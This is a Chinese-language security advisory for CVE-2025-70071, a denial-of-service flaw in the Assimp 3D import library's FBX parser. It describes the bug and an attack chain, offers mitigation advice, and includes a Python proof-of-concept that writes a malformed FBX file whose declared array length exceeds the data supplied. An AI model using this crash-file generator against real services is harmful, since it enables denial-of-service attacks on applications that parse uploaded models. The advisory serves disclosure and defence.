CVE-2025-70071 Assimp拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-70071

漏洞类型

拒绝服务

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Assimp

漏洞概述

CVE-2025-70071是Open Asset Import Library (Assimp)版本6.0.2中发现的一个安全漏洞。该漏洞被归类为中危漏洞，CVSS评分为5.9。其核心问题位于FBXParser.cpp文件的ParseVectorDataArray()函数中。由于该组件在处理特制的FBX文件时缺乏充分的输入验证或边界检查，远程攻击者可以通过诱导受害者解析恶意构造的3D模型文件来触发该漏洞。成功利用此漏洞可能导致应用程序崩溃或服务不可用，从而造成拒绝服务。由于该漏洞无需用户交互和身份认证即可通过网络利用，因此对依赖Assimp进行文件处理的服务端应用构成了一定威胁。

技术细节

该漏洞的根源在于Assimp库在解析FBX文件格式时的逻辑缺陷。具体而言，FBXParser.cpp文件中的ParseVectorDataArray()函数负责解析包含向量数据的数组结构。在处理某些异常或恶意的FBX文件数据时，该函数可能未能正确处理数据指针或数组长度。当攻击者构造一个包含畸形数据结构（例如畸形的数组长度声明或无效的内存引用）的FBX文件并传递给Assimp库进行解析时，ParseVectorDataArray()函数可能会尝试读取非法内存地址或触发整数溢出。这种错误操作会导致底层操作系统抛出异常（如段错误），进而导致正在使用Assimp库的应用程序异常终止。由于Assimp广泛应用于游戏引擎、3D建模软件和文件转换工具中，攻击者可以通过上传恶意文件到Web服务或分发恶意模型文件来发动攻击。攻击向量为网络，且无需特权，这意味着自动化攻击工具可以轻易地利用此漏洞对目标系统进行DoS攻击。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统正在使用Assimp库处理FBX格式的3D模型文件。

STEP 2

武器化

攻击者构造一个特制的恶意FBX文件，该文件包含针对ParseVectorDataArray()函数的畸形数组数据。

STEP 3

投递

攻击者通过文件上传接口、电子邮件附件或其他文件传输方式将恶意FBX文件发送至目标系统。

STEP 4

利用

目标系统的应用程序调用Assimp库解析该文件，触发FBXParser.cpp中的解析逻辑错误。

STEP 5

影响

应用程序在解析过程中发生内存访问违规，导致进程崩溃，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

def create_malformed_fbx(filename):
    """
    Generates a malformed FBX file to trigger the ParseVectorDataArray crash.
    The file declares a large array of doubles but provides insufficient data.
    """
    # FBX Binary Header
    magic = b'Kaydara FBX Binary\x20\x20\x00\x1a\x00'
    
    # FBX Node Header structure: EndOffset, NumProperties, PropertyListLen, NameLen, Name
    # We create a dummy node to hold the malicious property
    end_offset = 0 # Placeholder
    num_props = 1
    prop_list_len = 25 # 1 byte type + 4 bytes len + 4 bytes encoding + 4 bytes compressed_len + 12 bytes data
    name_len = 1
    name = b'P'
    
    node_header = struct.pack(">IIII", end_offset, num_props, prop_list_len, name_len)
    
    with open(filename, 'wb') as f:
        f.write(magic)
        f.write(node_header)
        f.write(name)
        
        # Property: Array of doubles ('d')
        f.write(b'd')
        
        # Length of array: Claim 100 elements
        array_len = 100
        f.write(struct.pack(">I", array_len))
        
        # Encoding: 0 (Raw, uncompressed)
        f.write(struct.pack(">I", 0))
        
        # Compressed length: 0
        f.write(struct.pack(">I", 0))
        
        # Malformed Data:
        # The parser expects 'array_len * 8' bytes (800 bytes).
        # We intentionally write less data to cause a read overflow or crash.
        f.write(b'\x00' * 12) # Only 12 bytes written
        
    print(f"[+] Malformed FBX file generated: {filename}")

if __name__ == "__main__":
    create_malformed_fbx("exploit_CVE-2025-70071.fbx")

影响范围

Assimp v6.0.2

防御指南

临时缓解措施

建议暂时禁止处理来自不可信来源的FBX文件，或在解析前使用预处理器验证文件结构的合法性。对于必须处理此类文件的服务，应设置资源限制和超时机制，以防止解析异常导致资源耗尽。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-70071
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-70071
3 Details https://www.cvedetails.com/cve/CVE-2025-70071/
4 VulDB https://vuldb.com/cve/CVE-2025-70071
5 Link http://assimp.com
6 Link https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea
7 Link https://gist.github.com/GunP4ng/6d80919905037929ce9266ccd207b9ea